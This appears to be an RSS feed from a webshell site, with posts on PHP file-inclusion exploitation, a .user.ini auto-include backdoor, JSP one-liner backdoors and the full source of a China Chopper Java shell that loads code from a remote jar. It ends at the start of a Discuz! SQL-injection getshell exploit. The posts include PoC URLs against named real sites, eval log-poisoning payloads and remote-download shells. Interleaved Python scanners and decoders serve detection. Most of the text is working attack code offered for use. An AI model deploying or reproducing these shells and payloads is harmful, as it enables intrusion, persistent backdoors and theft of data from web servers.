Latest undetectable ASP trojans | ASP webshells, http://www.mumaasp.com (ASP privilege-escalation shells, delete-resistant hidden shells, ASP trojan encryption and decryption, self-reviving shells). Feed generated Thu, 09 Apr 2015 09:19:16 +0000.

PHP big shell / small shell: clever tricks with file inclusion
http://www.mumaasp.com/243.html, Thu, 09 Apr 2015 09:19:15 +0000, by admin

Local File Include (LFI) vulnerabilities are familiar to everyone and there are plenty of papers about them, especially foreign ones, but nobody bothers to actually test them, so here is a write-up.

1. Plain local include

<?php $query=$_GET['p']; include($query); ?>

PoC: http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php, where ../hanguo/test.php is the path being included.
(screenshot: baohan1.jpg)
As long as the target server lets you upload something, the extension does not matter (jpg, txt, gif, ...): put a one-line webshell inside the file and include it. Simple, nothing more to say.

2. Truncated local include

require_once($a.'.php'); include($a.".php"); and similar calls append a fixed suffix, so the supplied path has to be cut off before the suffix is reached. On Windows there is an extra trick: pad the path with \. or ./ or \ or / (all of them work on Windows) until it exceeds the maximum path length, so the appended suffix falls off the end. (On Linux, .// works the same way.) The truncation principle is explained in the WooYun report "快乐购某分站文件包含漏洞" by 波波虎; a Linux truncation example is the WooYun report "济南大学主站本地文件包含导致代码执行", http://www.wooyun.org/bugs/wooyun-2011-02236.
%00 truncation needs magic_quotes_gpc=off and an old PHP: from 5.3.4 on, PHP rejects paths that contain a NUL byte.
PoC: http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3. Remote include

With allow_url_include=On you have remote file inclusion; with it Off you are limited to local includes. Test case:

<?php $query=$_GET['p']; include($query.".php"); ?>

Request: http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah.txt
Error:
Warning: main(http://www.mumaasp.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
Because of include($query.".php"), ".php" is appended and yeah.txt becomes yeah.txt.php. No truncation is needed here; turn the trick against itself: create a yeah.php on a server you control (www.axxer.com in the original), then request http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah and the ".php" is appended for you.

PHP's own stream wrappers can be used as well: include data:// or php://input. Both count as URL includes, so they need allow_url_include=On (and data: only exists from PHP 5.2). The original author reports them working on old PHP and failing in a 5.3 test, which is consistent with allow_url_include being Off by default. Somewhat niche, but a good idea to keep in mind.
http://www.schnelltest24.de/index.php?page=/etc/passwd has no suffix to truncate, so a wrapper can be tried there directly.
(screenshot: baohan2.jpg)
Use the wrapper and POST the payload as the request body.
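As an added example (not code from the original post), the following Python model answers the question a tester asks at this point: given the PHP settings the post mentions, what does include() actually try to open for each of the three cases above? The rules are PHP's documented behaviour (paths with a NUL byte rejected from 5.3.4, addslashes() applied by magic_quotes_gpc, allow_url_include gating URL wrappers); PhpConfig and resolve_include are names chosen here, and the inputs are the post's own PoC values.

```python
"""Model of what include() will try to open for the three cases in the post.
Added example, not code from the original post: PHP is not executed here,
its documented rules are encoded so the preconditions can be checked quickly."""
from dataclasses import dataclass
from urllib.parse import unquote_to_bytes

# include() treats these prefixes as URL includes; they need allow_url_include=On
URL_WRAPPERS = ("http://", "https://", "ftp://", "data:", "php://input")


@dataclass
class PhpConfig:
    version: tuple            # e.g. (5, 2, 17)
    magic_quotes_gpc: bool    # escapes GET/POST data with addslashes()
    allow_url_fopen: bool
    allow_url_include: bool   # default Off since PHP 5.2


def resolve_include(raw_param: str, suffix: str, cfg: PhpConfig):
    """Return (target, reason): the path or URL include() opens, or None plus the
    rule that stopped it. raw_param is the still URL-encoded query value and
    suffix is whatever the script appends (".php" for include($p.".php"))."""
    # the web server URL-decodes %00 and friends before PHP sees the value
    value = unquote_to_bytes(raw_param).decode("latin-1")
    if cfg.magic_quotes_gpc:
        # addslashes(): backslash, quotes and NUL get a backslash in front; NUL
        # becomes backslash+'0', so it no longer terminates the C string inside PHP
        value = (value.replace("\\", "\\\\").replace("\x00", "\\0")
                      .replace("'", "\\'").replace('"', '\\"'))
    path = value + suffix
    lowered = path.lower()
    if lowered.startswith(URL_WRAPPERS):
        if lowered.startswith("data:") and cfg.version < (5, 2, 0):
            return None, "data: wrapper does not exist before PHP 5.2"
        if not cfg.allow_url_include:
            return None, "allow_url_include=Off: include() refuses URL wrappers"
        if lowered.startswith(("http://", "https://", "ftp://")) and not cfg.allow_url_fopen:
            return None, "allow_url_fopen=Off: remote streams cannot be opened"
        return path, "remote/wrapper include"
    if "\x00" in path:
        if cfg.version >= (5, 3, 4):
            return None, "PHP >= 5.3.4 rejects paths containing a NUL byte"
        # older PHP hands the path to a C API that stops at the first NUL
        return path[: path.index("\x00")], "NUL byte truncated the appended suffix"
    return path, "plain local include"
```

Run it against a target's phpinfo() values before spending time on truncation tricks: with magic_quotes_gpc on, the %00 case returns a path containing a literal backslash-zero and the include simply fails.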
4. Advanced use: log inclusion

The WooYun report "济南大学主站本地文件包含导致代码执行" (http://www.wooyun.org/bugs/wooyun-2011-02236) already gives the trick away. In short:
(1) Request a non-existent URL that carries a one-liner (http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...); the failed request is written to the error.log file.
(2) Find the inclusion vulnerability, include the path of error.log, and pass the code to run in the s parameter:
http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././..........
Restriction and bypass: with a request like http://www.exp.com/index<?php eval($_POST[cmd]);?>.php, the space is percent-encoded before it reaches the log, so the log line contains <?php%20eval($_POST[cmd]);?>, which PHP will not execute. The space has to land in the log literally. It is the browser or HTTP library that encodes it; the server logs the request line as received, so hand-craft the raw request yourself (the post's own suggestion is a forged packet without the Connection header) and send it over a socket.

5. Other advanced uses
(1) Including /proc/self/environ: this uses the Linux process environment as the carrier. It often fails because /proc/self/environ is not readable, the same as with /etc/passwd. Usage is as described in point 4.
(2) phpinfo() temporary-file race inclusion. Depending on the case, %00 or another truncation may be needed, as introduced above.
(3) _SESSION file inclusion. The same remark on truncation applies.
(2) and (3) are covered in the "phpinfo temporary file inclusion" PDF referenced by the original post.

.user.ini: a powerful PHP backdoor
http://www.mumaasp.com/222.html, Tue, 30 Dec 2014 10:09:00 +0000, by admin

.user.ini. It applies more widely than .htaccess: nginx, Apache or IIS, any PHP running as FastCGI can use this method. All my nginx servers run php-fpm/FastCGI, my IIS boxes with PHP 5.3+ all use FastCGI/CGI, and my Apache on Windows also uses fcgi, so it covers a lot of ground, unlike .htaccess with its limitations.

.user.ini


So what is .user.ini? That starts with php.ini. php.ini is PHP's default configuration file and holds many settings, which fall into several modes: PHP_INI_SYSTEM, PHP_INI_PERDIR, PHP_INI_ALL and PHP_INI_USER. The list is at http://php.net/manual/zh/ini.list.php. What is the difference between the modes? The official explanation (table omitted here) says that a setting in PHP_INI_USER mode can be set with ini_set(), in the Windows registry, and in .user.ini.

So what is .user.ini? The manual explains:
In addition to the main php.ini, PHP scans for INI files in each directory, starting from the directory of the PHP file being executed and going up to the web root (as given by $_SERVER['DOCUMENT_ROOT']). If the executed PHP file is outside the web root, only its own directory is scanned. Only INI settings with the PHP_INI_PERDIR and PHP_INI_USER modes are recognised in .user.ini-style INI files.

That is clear enough: .user.ini is a php.ini that users can "customise", and the settings we can change are those in PHP_INI_PERDIR and PHP_INI_USER mode. (PHP_INI_PERDIR, which the table above does not list for ini_set(), can also be set in .user.ini.) In practice every mode except PHP_INI_SYSTEM, including PHP_INI_ALL, can be set through .user.ini.

Moreover, unlike php.ini, .user.ini is loaded dynamically: after modifying .user.ini there is no need to restart the web server; wait for the interval set by user_ini.cache_ttl (300 seconds by default) and it is re-read.

Looking through php.ini, I was disappointed to find that every remotely sensitive setting is PHP_INI_SYSTEM (or even php.ini-only), including disable_functions, extension_dir and enable_dl.

We can, however, easily build a "backdoor" out of .user.ini. Two interesting settings are auto_append_file and auto_prepend_file. Their descriptions: auto_prepend_file names a file that is automatically included before the file being executed, as if require() had been called at the top of it; auto_append_file is the same but includes the file at the end. Usage is simple, write it straight into .user.ini:
auto_prepend_file=01.gif 
01.gif is the file to include. So with .user.ini we can easily make every PHP file "automatically" include a given file, and that file can be a normal PHP file or one that holds a one-line webshell. I tested this on IIS 6.0 + FastCGI + PHP 5.3 and on nginx + php-fpm + PHP 5.3. The directory holds .user.ini, 01.gif with the webshell, and a normal PHP file echo.php (screenshots omitted). Requesting echo.php shows the backdoor, and the same holds on nginx.

So where can this trick be used? For example, a site that refuses .php uploads: upload a .user.ini and an image shell, and let the former include the latter to get a shell. The precondition is that the directory containing .user.ini must also contain a normal PHP file that gets requested, otherwise nothing triggers the include. Or, if you just want to hide a backdoor, this is the most convenient way.
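The defender's side of the trick above, as an added example that is not part of the original post: a Python scanner that walks a web root, reads every .user.ini (and php_value lines in .htaccess), and reports auto_prepend_file / auto_append_file targets that contain a PHP open tag but do not end in .php, together with whether the directory holds a real .php file to trigger it. Relative targets are resolved against the directory holding the INI file, which is an assumption made here (PHP actually resolves them through include_path); the sample tree is constructed in a temporary directory and mirrors the post's test layout.

```python
"""Scanner for the .user.ini / .htaccess auto-include trick described above.
Added example, not code from the original post."""
import os
import re
import tempfile

INI_NAMES = (".user.ini", ".htaccess")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# INI form: auto_prepend_file=01.gif   .htaccess form: php_value auto_prepend_file /path
DIRECTIVE = re.compile(r"(?:php_value\s+)?(auto_(?:prepend|append)_file)\s*[= ]\s*(.+)$")


def parse_auto_includes(text):
    """Yield (directive, value) for every auto_*_file line in INI or .htaccess syntax."""
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()          # INI comments start with ';'
        if not line or line.startswith("#"):           # .htaccess comments start with '#'
            continue
        m = DIRECTIVE.match(line)
        if m:
            yield m.group(1), m.group(2).strip().strip("\"'")


def scan_webroot(root):
    """Return one finding dict per auto-include directive found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in INI_NAMES:
                continue
            ini_path = os.path.join(dirpath, name)
            with open(ini_path, encoding="utf-8", errors="replace") as fh:
                entries = list(parse_auto_includes(fh.read()))
            for directive, value in entries:
                # assumption: relative targets live next to the INI file
                target = value if os.path.isabs(value) else os.path.join(dirpath, value)
                has_php = False
                if os.path.isfile(target):
                    with open(target, "rb") as fh:
                        has_php = bool(PHP_TAG.search(fh.read()))
                findings.append({
                    "ini": ini_path,
                    "directive": directive,
                    "target": target,
                    "target_exists": os.path.isfile(target),
                    "target_has_php_tag": has_php,
                    # the include only fires when a real .php file in this directory is requested
                    "php_files_in_dir": sum(f.endswith(".php") for f in files),
                    # the tell-tale combination: PHP code hidden behind a non-.php extension
                    "suspicious": has_php and not target.endswith(".php"),
                })
    return findings


def build_sample_webroot():
    """Constructed sample tree mirroring the post's test directory; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    with open(os.path.join(root, ".user.ini"), "w") as fh:
        fh.write("; constructed sample\nauto_prepend_file=01.gif\n")
    with open(os.path.join(root, "01.gif"), "wb") as fh:
        fh.write(b"GIF89a\n<?php eval($_POST['x']); ?>\n")   # image shell
    with open(os.path.join(root, "echo.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    clean = os.path.join(root, "static")
    os.mkdir(clean)
    with open(os.path.join(clean, ".user.ini"), "w") as fh:
        fh.write("upload_max_filesize=8M\n")                 # harmless directive, must not be reported
    return root
```

Because .user.ini is re-read every user_ini.cache_ttl seconds without a restart, a scan like this belongs in a periodic integrity check of upload directories, not only in a one-off incident review.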
JSP mini backdoors: JSP one-liner backdoors explained
http://www.mumaasp.com/203.html, Mon, 22 Dec 2014 06:25:48 +0000, by admin

1. Executing system commands
Without output:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Request: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls. Nothing is echoed back, which is convenient for spawning a reverse shell. With output and a password check:
<%
    // the "pwd" parameter must equal the hard-coded password before anything runs
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            // convert only the bytes read this round; new String(b) would also print stale buffer contents
            out.println(new String(b, 0, a));
        }
        out.print("</pre>");
    }
%>
Request: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Writing a string to a given file
Variant 1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Writing under the web root:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
Variant 2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Writing under the web root:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

3. Downloading a remote file (without Apache Commons IO there is no short way to turn an InputStream into a byte array, hence the length...)
<%
    java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
    byte[] b = new byte[1024];
    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
    int a = -1;
    while ((a = in.read(b)) != -1) {
        baos.write(b, 0, a);
    }
    new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray());
%>
Request: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Downloading under the web root:
<%
    java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
    byte[] b = new byte[1024];
    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
    int a = -1;
    while ((a = in.read(b)) != -1) {
        baos.write(b, 0, a);
    }
    new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());
%>
Request: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

4. Reflectively loading an external jar: the complete backdoor
If the backdoors above feel too weak and dated, try this one:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
Request: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Connecting with Caidao (China Chopper): http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, password 023.
Explanation: reflection loads an external jar into the current application and invokes it, printing the result. request.getParameterMap() holds all request parameters. Because the jar is external, the server must be able to reach the jar URL. Note that getMethods()[0] relies on load() being the first method returned, and the JVM does not guarantee that order; looking the method up by name is more robust.
Download: Cat.jar (rar)
Load code:
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;

/**
 *
 * @author yz
 */
public class Load {

    public static String load(Map<String,String[]> map){
        try {
            Map<String,String> request = new HashMap<String,String>();
            for (Entry<String, String[]> entrySet : map.entrySet()) {
                String key = entrySet.getKey();
                String value = entrySet.getValue()[0];
                request.put(key, value);
            }
            return new Chopper().doPost(request);
        } catch (IOException ex) {
            return ex.toString();
        }
    }

}
Chopper代码:
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLClassLoader;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.ResultSetMetaData;
import java.sql.Statement;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Map;

public class Chopper{

    public static String getPassword() throws IOException {
        return "023";
    }

    String cs = "UTF-8";

    String encoding(String s) throws Exception {
        return new String(s.getBytes("ISO-8859-1"), cs);
    }

    Connection getConnection(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        try {
            Class.forName(x[0].trim());
        } catch (ClassNotFoundException e) {
            boolean classNotFound = true;
            BufferedReader br = new BufferedReader(new InputStreamReader(this.getClass().getResourceAsStream("/map.txt")));
            String str = "";
            while ((str = br.readLine()) != null) {
                String[] arr = str.split("=");
                if (arr.length == 2 && arr[0].trim().equals(x[0].trim())) {
                    try {
                        URLClassLoader ucl = (URLClassLoader) ClassLoader.getSystemClassLoader();
                        Method m = URLClassLoader.class.getDeclaredMethod("addURL", URL.class);
                        m.setAccessible(true);
                        // map.txt entries with several comma-separated jars are passed as one URL here and will fail
                        m.invoke(ucl, new Object[]{new URL(arr[1])});
                        Class.forName(arr[0].trim());
                        classNotFound = false;
                        break;
                    } catch (ClassNotFoundException ex) {
                        throw ex;
                    }
                }
            }
            if (classNotFound) {
                throw e;
            }
        }
        if (x[1].contains("jdbc:oracle")) {
            return DriverManager.getConnection(x[1].trim() + ":" + x[4],
                    x[2].equalsIgnoreCase("[/null]") ? "" : x[2],
                    x[3].equalsIgnoreCase("[/null]") ? "" : x[3]);
        } else {
            Connection c = DriverManager.getConnection(x[1].trim(),
                    x[2].equalsIgnoreCase("[/null]") ? "" : x[2],
                    x[3].equalsIgnoreCase("[/null]") ? "" : x[3]);
            if (x.length > 4) {
                c.setCatalog(x[4]);
            }
            return c;
        }
    }

    void listRoots(ByteArrayOutputStream out) throws Exception {
        File r[] = File.listRoots();
        for (File f : r) {
            out.write((f.getName()).getBytes(cs));
        }
    }

    void dir(String s, ByteArrayOutputStream out) throws Exception {
        File l[] = new File(s).listFiles();
        for (File f : l) {
            String mt = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(f.lastModified()));
            String rw = (f.canRead() ? "R" : "") + (f.canWrite() ? " W" : "");
            out.write((f.getName() + (f.isDirectory() ? "/" : "") + "\t" + mt + "\t" + f.length() + "\t" + rw + "\n").getBytes(cs));
        }
    }

    void deleteFiles(File f) throws Exception {
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (File fs : x) {
                deleteFiles(fs);
            }
        }
        f.delete();
    }

    byte[] readFile(String s) throws Exception {
        int n;
        byte[] b = new byte[1024];
        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(s));
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        while ((n = bis.read(b)) != -1) {
            bos.write(b, 0, n);
        }
        bis.close();
        return bos.toByteArray();
    }

    void upload(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
        }
        os.close();
    }

    void filesMove(File sf, File df) throws Exception {
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (File z1 : z) {
                filesMove(new File(sf, z1.getName()), new File(df, z1.getName()));
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[1024];
            while ((n = is.read(b)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void fileMove(File s, File d) throws Exception {
        s.renameTo(d);
    }

    void mkdir(File s) throws Exception {
        s.mkdir();
    }

    void setLastModified(File s, String t) throws Exception {
        s.setLastModified(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").parse(t).getTime());
    }

    void downloadRemoteFile(String s, String d) throws Exception {
        int n = 0;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) new URL(s).openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[1024];
        while ((n = is.read(b)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void inputStreamToOutPutStream(InputStream is, ByteArrayOutputStream out) throws Exception {
        int i = -1;
        byte[] b = new byte[1024];
        while ((i = is.read(b)) != -1) {
            out.write(b, 0, i);
        }
    }

    void getCurrentDB(String s, ByteArrayOutputStream out) throws Exception {
        Connection c = getConnection(s);
        ResultSet r = s.contains("jdbc:oracle") ? c.getMetaData().getSchemas() : c.getMetaData().getCatalogs();
        while (r.next()) {
            out.write((r.getObject(1) + "\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void getTableName(String s, ByteArrayOutputStream out) throws Exception {
        Connection c = getConnection(s);
        String[] x = s.trim().split("\r\n");
        ResultSet r = c.getMetaData().getTables(null, s.contains("jdbc:oracle") ? x.length > 5 ? x[5] : x[4] : null, "%", new String[]{"TABLE"});
        while (r.next()) {
            out.write((r.getObject("TABLE_NAME") + "\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void getTableColumn(String s, ByteArrayOutputStream out) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = getConnection(s);
        ResultSet r = c.prepareStatement("select * from " + x[x.length - 1]).executeQuery();
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            out.write((d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void executeQuery(String cs, String s, String q, ByteArrayOutputStream out, String p) throws Exception {
        Connection c = getConnection(s);
        Statement m = c.createStatement(1005, 1008);
        BufferedWriter bw = null;
        try {
            boolean f = q.contains("--f:");
            ResultSet r = m.executeQuery(f ? q.substring(0, q.indexOf("--f:")) : q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (int i = 1; i <= n; i++) {
                out.write((d.getColumnName(i) + "\t|\t").getBytes(cs));
            }
            out.write(("\r\n").getBytes(cs));
            if (f) {
                File file = new File(p);
                if (!q.contains("-to:")) {
                    file.mkdir();
                }
                bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.contains("-to:") ? p.trim() : p + q.substring(q.indexOf("--f:") + 4, q.length()).trim()), true), cs));
            }
            while (r.next()) {
                for (int i = 1; i <= n; i++) {
                    if (f) {
                        bw.write(r.getObject(i) + "" + "\t");
                        bw.flush();
                    } else {
                        out.write((r.getObject(i) + "" + "\t|\t").getBytes(cs));
                    }
                }
                if (bw != null) {
                    bw.newLine();
                }
                out.write(("\r\n").getBytes(cs));
            }
            r.close();
            if (bw != null) {
                bw.close();
            }
        } catch (Exception e) {
            out.write(("Result\t|\t\r\n").getBytes(cs));
            try {
                m.executeUpdate(q);
                out.write(("Execute Successfully!\t|\t\r\n").getBytes(cs));
            } catch (Exception ee) {
                out.write((ee.toString() + "\t|\t\r\n").getBytes(cs));
            }
        }
        m.close();
        c.close();
    }

    public String doPost(Map<String,String>request) throws IOException {
        cs = request.get("z0") != null ? request.get("z0") + "" : cs;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try {
            char z = (char) request.get(getPassword()).getBytes()[0];
            String z1 = encoding(request.get("z1") + "");
            String z2 = encoding(request.get("z2") + "");
            out.write("->|".getBytes(cs));
            String s = new File("").getCanonicalPath();
            byte[] returnTrue = "1".getBytes(cs);
            switch (z) {
                case 'A':
                    out.write((s + "\t").getBytes(cs));
                    if (!s.substring(0, 1).equals("/")) {
                        listRoots(out);
                    }
                    break;
                case 'B':
                    dir(z1, out);
                    break;
                case 'C':
                    String l = "";
                    BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
                    while ((l = br.readLine()) != null) {
                        out.write((l + "\r\n").getBytes(cs));
                    }
                    br.close();
                    break;
                case 'D':
                    BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
                    bw.write(z2);
                    bw.flush();
                    bw.close();
                    out.write(returnTrue);
                    break;
                case 'E':
                    deleteFiles(new File(z1));
                    out.write("1".getBytes(cs));
                    break;
                case 'F':
                    out.write(readFile(z1));
                    break;   // without this, a read request fell through into the upload case
                case 'G':
                    upload(z1, z2);
                    out.write(returnTrue);
                    break;
                case 'H':
                    filesMove(new File(z1), new File(z2));
                    out.write(returnTrue);
                    break;
                case 'I':
                    fileMove(new File(z1), new File(z2));
                    out.write(returnTrue);
                    break;
                case 'J':
                    mkdir(new File(z1));
                    out.write(returnTrue);
                    break;
                case 'K':
                    setLastModified(new File(z1), z2);
                    out.write(returnTrue);
                    break;
                case 'L':
                    downloadRemoteFile(z1, z2);
                    out.write(returnTrue);
                    break;
                case 'M':
                    String[] c = {z1.substring(2), z1.substring(0, 2), z2};
                    Process p = Runtime.getRuntime().exec(c);
                    inputStreamToOutPutStream(p.getInputStream(), out);
                    inputStreamToOutPutStream(p.getErrorStream(), out);
                    break;
                case 'N':
                    getCurrentDB(z1, out);
                    break;
                case 'O':
                    getTableName(z1, out);
                    break;
                case 'P':
                    getTableColumn(z1, out);
                    break;
                case 'Q':
                    executeQuery(cs, z1, z2, out, z2.contains("-to:") ? z2.substring(z2.indexOf("-to:") + 4, z2.length()) : s.replaceAll("\\\\", "/") + "images/");
                    break;
            }
        } catch (Exception e) {
            out.write(("ERROR" + ":// " + e.toString()).getBytes(cs));
        }
        out.write(("|<-").getBytes(cs));
        return new String(out.toByteArray());
    }

}
map.txt:
oracle.jdbc.driver.OracleDriver=http://p2j.cn/jdbc/classes12.jar
com.mysql.jdbc.Driver=http://p2j.cn/jdbc/mysql-connector-java-5.1.14-bin.jar
com.microsoft.jdbc.sqlserver.SQLServerDriver=http://p2j.cn/jdbc/sqlserver2000/msbase.jar,http://p2j.cn/jdbc/sqlserver2000/mssqlserver.jar,http://p2j.cn/jdbc/sqlserver2000/msutil.jar
com.microsoft.sqlserver.jdbc.SQLServerDriver=http://p2j.cn/jdbc/sqljdbc4.jar
com.ibm.db2.jcc.DB2Driver=http://p2j.cn/jdbc/db2java.jar
com.informix.jdbc.IfxDriver=http://p2j.cn/jdbc/ifxjdbc.jar
com.sybase.jdbc3.jdbc.SybDriver=http://p2j.cn/jdbc/jconn3d.jar
org.postgresql.Driver=http://p2j.cn/jdbc/postgresql-9.2-1003.jdbc4.jar
com.ncr.teradata.TeraDriver=http://p2j.cn/jdbc/teradata-jdbc4-14.00.00.04.jar
com.hxtt.sql.access.AccessDriver=http://p2j.cn/jdbc/Access_JDBC30.jar
org.apache.derby.jdbc.ClientDriver=http://p2j.cn/jdbc/derby.jar
org.hsqldb.jdbcDriver=http://p2j.cn/jdbc/hsqldb.jar
net.sourceforge.jtds.jdbc.Driver=http://p2j.cn/jdbc/jtds-1.2.5.jar
mongodb=http://p2j.cn/jdbc/mongo-java-driver-2.9.3.jar
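For an incident responder who captures traffic to a shell like the one above, the useful artefact is the decoded operation, not the raw POST. The following Python decoder is an added example, not code from the original post or from the Cat.jar author: the parameter names (the password-named opcode parameter, z0, z1, z2), the opcode letters and the ->| ... |<- response framing are taken from Chopper.doPost() above, while the request bodies it is tested with are constructed here.

```python
"""Decoder for the request/response format handled by Chopper.doPost() above.
Added example; opcode letters and parameter names come from that Java code."""
from urllib.parse import parse_qs

OPCODES = {
    "A": "list_roots_and_cwd", "B": "dir", "C": "read_text", "D": "write_text",
    "E": "delete", "F": "read_binary", "G": "upload_hex", "H": "copy_tree",
    "I": "rename", "J": "mkdir", "K": "set_mtime", "L": "download_remote",
    "M": "exec", "N": "list_databases", "O": "list_tables", "P": "list_columns",
    "Q": "sql_query",
}
DB_OPS = ("N", "O", "P", "Q")


def decode_request(body: str, password: str) -> dict:
    """Map a captured POST body to the operation Chopper.doPost() would run."""
    # the servlet hands over ISO-8859-1 strings; Chopper.encoding() re-decodes them in z0
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True, encoding="latin-1").items()}
    if password not in params:
        raise ValueError("no parameter named after the shell password: not a Chopper request")
    charset = params.get("z0", "UTF-8")

    def recode(s: str) -> str:
        return s.encode("latin-1").decode(charset, errors="replace")

    op = params[password][:1]                     # only the first byte is the opcode
    z1, z2 = recode(params.get("z1", "")), recode(params.get("z2", ""))
    info = {"opcode": op, "operation": OPCODES.get(op, "unknown"),
            "charset": charset, "z1": z1, "z2": z2}
    if op == "M":
        # case 'M': {z1.substring(2), z1.substring(0, 2), z2} -> e.g. ["/bin/sh", "-c", cmd]
        info["argv"] = [z1[2:], z1[:2], z2]
    elif op == "G":
        # upload(): hex decoded with "0123456789ABCDEF".indexOf(), so lowercase digits are corrupted
        if z2 != z2.upper():
            raise ValueError("lowercase hex would be mangled by the Java decoder")
        info["upload_path"], info["upload_bytes"] = z1, bytes.fromhex(z2)
    elif op in DB_OPS:
        # getConnection(): driver class, JDBC URL, user, password[, database] separated by CRLF
        keys = ["driver", "jdbc_url", "user", "password", "database"]
        info["db"] = dict(zip(keys, z1.strip().split("\r\n")))
        if op == "Q":
            info["sql"] = z2
    return info


def extract_response(page: str) -> str:
    """Pull the shell output out of the surrounding page: doPost() writes ->| ... |<-."""
    start, end = page.find("->|"), page.rfind("|<-")
    if start == -1 or end == -1 or end < start:
        raise ValueError("no Chopper response markers in page")
    return page[start + 3:end]
```

The password parameter carrying the opcode is what makes these requests detectable even when the shell file itself is not on disk (it is loaded from a remote jar in the reflect.jsp variant): a POST whose body has a single-letter value in A-Q plus z1/z2 parameters is a strong signal.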
Discuz! 7.2 SQL injection exp (getshell version), reposted
http://www.mumaasp.com/195.html, Fri, 11 Jul 2014 10:09:18 +0000, by admin

Options: 1. direct getshell 2. dump the admin account and password 3. dump the table prefix. If the table prefix is not the default cdb_, just change $table in the code.
<?php

/**
* @author: xiaoma
